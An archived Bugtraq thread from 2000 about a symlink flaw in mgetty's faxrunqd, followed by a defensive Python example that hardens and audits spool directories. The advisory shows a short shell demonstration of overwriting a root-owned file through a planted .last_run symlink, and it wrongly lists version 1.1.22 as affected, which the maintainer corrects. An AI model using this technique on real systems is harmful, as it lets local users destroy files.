5400571 2000-08-26 09:16 /88 lines/ Brevbäraren (which is implemented in) Python
Recipient: Bugtraq (import) <12410>
Subject: Advisory: mgetty local compromise
------------------------------------------------------------
From: Stan Bubrouski <satan@FASTDIAL.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <4.3.1.2.20000826015347.00b8e220@pop.crosswinds.net>

Author            : Stan Bubrouski
Date              : August 26, 2000
Package           : mgetty
Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
Severity          : faxrunqd follows symbolic links when creating
certain files. The default location for the files is /var/spool/fax/outgoing,
which is a world-writable directory. Local users can destroy the contents
of any file on a mounted filesystem because faxrunqd is usually run by root.

Problem           : mgetty comes with a program named faxrunqd, which is
a daemon to send fax jobs queued by faxspool(1). Upon successful execution,
a file named .last_run is created in the /var/spool/fax/outgoing/
directory, which is world-writable. The problem lies in the fact that faxrunqd
will follow symlinks created by any user, allowing file creation anywhere
and allowing existing files to be overwritten/destroyed.

Example:

Remote unprivileged user:

[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt   3 root     root         1024 Jun  2 18:46 .
drwxr-xr-x   4 root     root         1024 Jun  2 18:46 ..
drwxrwxrwx   2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--   1 root     root           12 Jun  2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt   3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x   4 root     root         1024 Jun  2 18:46 ..
lrwxrwxrwx   1 user     users          13 Jun  2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx   2 root     root         1024 Jun  1 00:47 locks

Root console:

[root@king /tmp]# faxrunqd -l ttyS0
...

Remote unprivileged user:

[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt   3 root     root         1024 Jun  2 18:48 .
drwxr-xr-x   4 root     root         1024 Jun  2 18:48 ..
lrwxrwxrwx   1 user     users          13 Jun  2 18:48 .last_run -> /etc/smash_me
drwxrwxrwx   2 root     root         1024 Jun  1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r--   1 root     root           44 Jun  2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun  2 18:48:47 2000 /usr/sbin/faxrunqd
[user@king /tmp]$

Believed to be vulnerable:

Red Hat Linux 6.2 and all prior versions (Vulnerable)
Linux-Mandrake 7.1 and all prior versions (Vulnerable)
Conectiva Linux 4.2, 5.0, and 5.1 (Untested)
LinuxPPC 1999 and 2000 (Untested)
TurboLinux 4.0, 6.0 (Untested)
Debian 2.2 (potato), 2.1 (slink) (Untested)
Yellow Dog Linux Champion Server 1.0, 1.1, 1.2 (Untested)
MkLinux Pre Release 1 (R1) (Untested)
Caldera OpenLinux 2.2, 2.3, 2.4 (Untested)
Think Blue Linux 1.0 (Linux for the S/390) (Untested)
OpenBSD 2.7? (mgetty is included in ports packages)
NetBSD 1.4.2?
FreeBSD?
Probably others...

Believed to be unaffected:

SuSE - all versions
Slackware - all versions
(5400571) ------------------------------------------(Reflowed)
Comment in text 5402206 by Brevbäraren (which is implemented in) Python

5402206 2000-08-26 22:19 /56 lines/ Brevbäraren (which is implemented in) Python
Recipient: Bugtraq (import) <12414>
Comment on text 5400571 by Brevbäraren (which is implemented in) Python
Subject: Re: Advisory: mgetty local compromise
------------------------------------------------------------
From: Gert Doering <gert@GREENIE.MUC.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000826110209.A17587@greenie.muc.de>

Hi,

aren't there things you *REALLY* hate? This is one of them.
On Sat, Aug 26, 2000 at 02:23:05AM -0400, Stan Bubrouski wrote:
> Author            : Stan Bubrouski
> Date              : August 26, 2000
> Package           : mgetty
> Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
> Severity          : faxrunqd follows symbolic links when creating
> certain files. The default location for the files is /var/spool/fax/outgoing,
> which is a world-writable directory. Local users can destroy the contents
> of any file on a mounted filesystem because faxrunqd is usually run by root.
>
> Problem           : mgetty comes with a program named faxrunqd, which is
> a daemon to send fax jobs queued by faxspool(1). Upon successful execution,
> a file named .last_run is created in the /var/spool/fax/outgoing/
> directory which is world-writable. The problem lies in the fact faxrunqd
> will follow symlinks created by any user, allowing file creation anywhere
> and allowing existing files to be overwritten/destroyed.

First of all, this hole does NOT exist anymore in 1.1.22. It has been
reported to me by the FreeBSD people, and closed on August 14, 2000.

1.1.22 has been released on August 17, 2000, and can be found on the usual
places (http://alpha.greenie.net/mgetty/).

So, please, get your facts right before posting.

Second, I am really annoyed to find this on bugtraq, with false data,
without any prior contact. The fact that I just released 1.1.22 should
give you enough hint that I am still maintaining mgetty, and sending me a
quick mail "hey, is this bug still open?" would have been in order.

Also, it would have saved *you* the embarrassment to report something to
bugtraq that is already fixed.

Vendor releases might still be vulnerable (shipping old versions), but as
faxrunqd(8) isn't usually run by default, a "standard system" should NOT
be vulnerable. *If* you run faxrunqd, though, upgrade to 1.1.22 (but
those of you that do, you know who you are...)

gert
--
USENET is *not* the non-clickable part of WWW!
//www.muc.de/~gert/
Gert Doering - Munich, Germany                             gert@greenie.muc.de
fax: +49-89-35655025                        gert.doering@physik.tu-muenchen.de
(5402206) ------------------------------------------(Reflowed)
Comment in text 5402257 by Brevbäraren (which is implemented in) Python
Comment in text 5402267 by Brevbäraren (which is implemented in) Python

5402257 2000-08-26 22:54 /34 lines/ Brevbäraren (which is implemented in) Python
Recipient: Bugtraq (import) <12415>
Comment on text 5402206 by Brevbäraren (which is implemented in) Python
Subject: Re: Advisory: mgetty local compromise
------------------------------------------------------------
From: Gert Doering <gert@GREENIE.MUC.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000826120951.A18596@greenie.muc.de>

Hi,

sorry to follow up on myself, but...:

On Sat, Aug 26, 2000 at 11:02:09AM +0200, Gert Doering wrote:
> Vendor releases might still be vulnerable (shipping old versions), but as
> faxrunqd(8) isn't usually run by default, a "standard system" should NOT
> be vulnerable. *If* you run faxrunqd, though, upgrade to 1.1.22 (but
> those of you that do, you know who you are...)

... this is crap. faxrunq(8) had the same bug as faxrunqd(8) here (which
the original "advisory" didn't mention). It has also been fixed in 1.1.22.

So, let me rephrase this:

IF you are using the "sendfax" part of mgetty+sendfax AND you have
possibly-malicious users on your system, then you should urgently upgrade
to 1.1.22 (which should be a matter of "make; make install").

If all your users are trustworthy, you don't have a problem, as this
can't be remotely exploited.

gert
--
USENET is *not* the non-clickable part of WWW!
//www.muc.de/~gert/
Gert Doering - Munich, Germany                             gert@greenie.muc.de
fax: +49-89-35655025                        gert.doering@physik.tu-muenchen.de
(5402257) ------------------------------------------(Reflowed)

5402267 2000-08-26 23:02 /94 lines/ Brevbäraren (which is implemented in) Python
Recipient: Bugtraq (import) <12418>
Comment on text 5402206 by Brevbäraren (which is implemented in) Python
Subject: Re: Advisory: mgetty local compromise
------------------------------------------------------------
From: Stan Bubrouski <satan@FASTDIAL.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <39A7D80F.ABB4289C@fastdial.net>

Gert Doering wrote:
> Hi,
>
> aren't there things you *REALLY* hate? This is one of them.
>

Hate is a strong word. Mistakes are mistakes. Move on. If you really
hate things so much why not post them yourself to save others the trouble
of reporting the problem? You know this ships with most of the most
popular linux distributions, so chances are that people are affected by
this.

> On Sat, Aug 26, 2000 at 02:23:05AM -0400, Stan Bubrouski wrote:
> > Author            : Stan Bubrouski
> > Date              : August 26, 2000
> > Package           : mgetty
> > Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
> > Severity          : faxrunqd follows symbolic links when creating
> > certain files. The default location for the files is /var/spool/fax/outgoing,
> > which is a world-writable directory. Local users can destroy the contents
> > of any file on a mounted filesystem because faxrunqd is usually run by root.
> >
> > Problem           : mgetty comes with a program named faxrunqd, which is
> > a daemon to send fax jobs queued by faxspool(1). Upon successful execution,
> > a file named .last_run is created in the /var/spool/fax/outgoing/
> > directory which is world-writable. The problem lies in the fact faxrunqd
> > will follow symlinks created by any user, allowing file creation anywhere
> > and allowing existing files to be overwritten/destroyed.
>
> First of all, this hole does NOT exist anymore in 1.1.22. It has been
> reported to me by the FreeBSD people, and closed on August 14, 2000.
>

Yeah and this report was constructed based on what I wrote on June 2nd
and was subsequently ignored.

> 1.1.22 has been released on August 17, 2000, and can be found on the usual
> places (http://alpha.greenie.net/mgetty/).
>

Yeah I know. It was an error. I meant to put that in a "Versions unaffected:"
row, but for some reason left on the same line as unaffected. See I had
actually reported this to bugtraq over two months ago, and only one vendor
addressed the problem and they did it covertly so nobody knew. It didn't
help either that when I made the original report I had it listed in a
message explaining compromises on Red Hat Linux 6.2 and so the scope of
the problem was never recognized. I only made this report to clarify the
vulnerability and because it had now been fixed. My original report was
to Red Hat on June 2, 2000. It's the same as in the advisory except it
only shows how it is a problem. That is at
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=11874

> So, please, get your facts right before posting.
>
> Second, I am really annoyed to find this on bugtraq, with false data,
> without any prior contact. The fact that I just released 1.1.22 should
> give you enough hint that I am still maintaining mgetty, and sending me a
> quick mal "hey, is this bug still open?" would have been in order.
>
> Also, it would have saved *you* the embarrassment to report something to
> bugtraq that is already fixed.

Not sure I understand this. I thought that's what vendors usually want.
A report on a vulnerability after a patch or fix is available. If this is
not the case please let me know, I have scathing holes in other software
that are not public because they have yet to be fixed. Get real.

I don't get embarrassed by a simple typo, do you?
> Vendor releases might still be vulnerable (shipping old versions), but as
> faxrunqd(8) isn't usually run by default, a "standard system" should NOT
> be vulnerable. *If* you run faxrunqd, though, upgrade to 1.1.22 (but
> those of you that do, you know who you are...)
>
> gert
> --
> USENET is *not* the non-clickable part of WWW!
> //www.muc.de/~gert/
> Gert Doering - Munich, Germany                             gert@greenie.muc.de
> fax: +49-89-35655025                        gert.doering@physik.tu-muenchen.de

Later.
Stan Bubrouski
(5402267) ------------------------------------------(Reflowed)

5402262 2000-08-26 22:56 /100 lines/ Brevbäraren (which is implemented in) Python
Recipient: Bugtraq (import) <12417>
Subject: Re: Advisory: mgetty local compromise
------------------------------------------------------------
From: Gert Doering <gert@GREENIE.MUC.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000826165612.H20258@greenie.muc.de>

Hi,

On Sat, Aug 26, 2000 at 10:45:35AM -0400, Stan Bubrouski wrote:
> > On Sat, Aug 26, 2000 at 02:23:05AM -0400, Stan Bubrouski wrote:
> > > Author            : Stan Bubrouski
> > > Date              : August 26, 2000
> > > Package           : mgetty
> > > Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
[..]
> > First of all, this hole does NOT exist anymore in 1.1.22. It has been
> > reported to me by the FreeBSD people, and closed on August 14, 2000.
>
> Yeah and this report was constructed based on what I wrote on June 2nd
> and was subsequently ignored.

You never reported it to *me*. It's pretty clear from all the
documentation that I wrote mgetty+sendfax and still maintain it. You
reported it to "some Linux vendor" (which is good, indeed, but not
sufficient).

Actually, if you look at the bugzilla ID that you quote, you see that I
did respond to it, after one of the FreeBSD crowd pointed me to it.

> > 1.1.22 has been released on August 17, 2000, and can be found on the usual
> > places (http://alpha.greenie.net/mgetty/).
>
> Yeah I know. It was an error. I meant to put that in a "Versions unaffected:"
> row, but for some reason left on the same line as unaffected.

*sigh*

> See I had actually reported this to bugtraq over two months ago,

You haven't. You have reported this to RedHat's "bugzilla" database,
which is something completely different.

Checking the bugtraq archives, there are exactly two articles containing
the word "faxrunq". Both are written by me, in July 1997 - seems that
your article from today is not yet indexed. Other articles from July
this year are certainly visible.

> and only one vendor addressed
> the problem and they did it covertly so nobody knew.

The "vendor" of mgetty+sendfax is *me*. You have not notified me, or the
mgetty mailing list.

[..]
> I only made this report to clarify the vulnerability and because it had now been
> fixed.

In that case, please re-read the stuff before you post. What you did was
to cause much fuss, much panic ("what, 1.1.22 vulnerable as well?"), and
no good.

The fact that there was this bug in 1.1.21 has been clearly reported in
the mgetty list (and it's in the ChangeLog), and Linux distribution
vendors usually pick up new releases quite quickly, so they should have
fixed versions available RSN.

[..]
> > Second, I am really annoyed to find this on bugtraq, with false data,
> > without any prior contact. The fact that I just released 1.1.22 should
> > give you enough hint that I am still maintaining mgetty, and sending me a
> > quick mal "hey, is this bug still open?" would have been in order.
>
> Not sure I understand this. I thought thats what vendors usually want.
> A report on a vulnerability after a patch or fix is available.

Huh? Vendors want the report on the vulnerability when you know about a
problem, to be able to *develop* a fix. How do you think a vendor can
develop a fix if you don't tell 'em?

(Maybe we have different views what a "vendor" is. For mgetty+sendfax, I
am, as the main author and coordinator).
> If this is not
> the case please let me know, I have scathing holes in other software that
> are not public because they have yet to be fixed. Get real.
>
> I don't get embarressed by a simple typo, do you?

You better should. Claiming publicly that something is vulnerable, even
giving version numbers, when you really should know that it's fixed
should be embarrassing. That's much more than a "simple typo".

gert
--
USENET is *not* the non-clickable part of WWW!
//www.muc.de/~gert/
Gert Doering - Munich, Germany                             gert@greenie.muc.de
fax: +49-89-35655025                        gert.doering@physik.tu-muenchen.de
(5402262) ------------------------------------------(Reflowed)
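The defensive side of the bug Stan's advisory describes (a root daemon writing .last_run into a world-writable spool directory through whatever symlink a local user has planted there), as an added example that is not part of the thread and not mgetty's own code: safe_write_marker() shows how a privileged process should create such a marker, and audit_spool_dir() is the check an admin can run against a directory like /var/spool/fax/outgoing. The temp directory, the smash_me file, the function names and the "run N" contents are all constructed for the demo, and the code assumes a platform with O_NOFOLLOW (Linux, BSD, macOS).

```python
import os
import stat
import tempfile
from pathlib import Path

def safe_write_marker(directory, name, content):
    """Write directory/name the way a root daemon should write a marker such as
    .last_run: never through a symlink, never into a file someone else planted."""
    try:
        # O_NOFOLLOW: open() fails (ELOOP) if the final path component is a symlink
        fd = os.open(os.path.join(directory, name), os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW, 0o644)
    except OSError:
        return False  # refused: a planted symlink is not followed
    try:
        st = os.fstat(fd)  # check what was actually opened, not the path name
        if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid() or st.st_nlink != 1:
            return False  # not a plain file, not ours, or a planted hard link
        os.ftruncate(fd, 0)
        os.write(fd, content.encode())
        return True
    finally:
        os.close(fd)

def audit_spool_dir(directory):
    """Report whether anyone can create entries in directory and which entries are
    symlinks (and to where); a sticky bit alone does not stop symlink planting."""
    findings = []
    if os.lstat(directory).st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    for entry in sorted(os.listdir(directory)):
        p = os.path.join(directory, entry)
        if os.path.islink(p):
            findings.append(f"symlink {entry} -> {os.readlink(p)}")
    return findings

def demo():
    """Constructed scenario: a planted .last_run symlink in a 1777 spool dir, then a clean run."""
    with tempfile.TemporaryDirectory() as spool:
        os.chmod(spool, 0o1777)  # drwxrwxrwt, as in the advisory's listing
        target, marker = os.path.join(spool, "smash_me"), os.path.join(spool, ".last_run")
        Path(target).write_text("Smash me!!!")  # stands in for the root-owned victim file
        os.symlink(target, marker)  # what the local user plants in the spool dir
        findings = audit_spool_dir(spool)
        via_symlink = safe_write_marker(spool, ".last_run", "run 1")  # must be refused
        os.unlink(marker)
        clean = safe_write_marker(spool, ".last_run", "run 2")  # no symlink: succeeds
        return {"findings": findings, "via_symlink": via_symlink, "clean": clean,
                "victim": Path(target).read_text(), "marker": Path(marker).read_text()}
```

The victim file keeps its original contents after the refused write, which is exactly what the advisory's second ls/cat listing shows faxrunqd failing to guarantee.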